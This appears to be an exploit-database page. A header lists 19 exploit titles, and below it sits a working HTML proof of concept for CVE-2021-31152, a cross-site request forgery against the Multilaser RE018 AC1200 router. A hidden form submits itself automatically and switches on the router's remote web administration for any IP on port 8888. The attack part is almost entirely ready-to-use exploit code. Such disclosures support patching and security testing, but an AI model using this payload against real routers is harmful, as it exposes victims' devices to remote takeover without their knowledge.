7fa85628bd
19 changes to exploits/shellcodes Hasura GraphQL 1.3.3 - Denial of Service Tenda D151 & D301 - Configuration Download (Unauthenticated) rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access) Fast PHP Chat 1.3 - 'my_item_search' SQL Injection WordPress Plugin RSS for Yandex Turbo 1.29 - Stored Cross-Site Scripting (XSS) BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS) Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS) rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2) OpenEMR 5.0.2.1 - Remote Code Execution Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS) Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS) Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration GravCMS 1.10.7 - Unauthenticated Arbitrary YAML Write/Update (Metasploit) Hasura GraphQL 1.3.3 - Local File Read Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)
22 lines
No EOL
721 B
HTML
22 lines
No EOL
721 B
HTML
# Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)
|
|
# Date: 14/04/2021
|
|
# Exploit Author: Rodolfo Mariano
|
|
# Version: Firmware V02.03.01.45_pt
|
|
# CVE: CVE-2021-31152
|
|
|
|
#Exploit code:
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.0.1/goform/setSysTools" method="POST">
|
|
<input name="module4" value="remoteWeb" type="hidden">
|
|
<input name="remoteWebType" value="any" type="hidden">
|
|
<input name="remoteWebIP" value="" type="hidden">
|
|
<input name="remoteWebPort" value="8888" type="hidden">
|
|
<input type="submit" value="Submit request">
|
|
</form>
|
|
</body>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html> |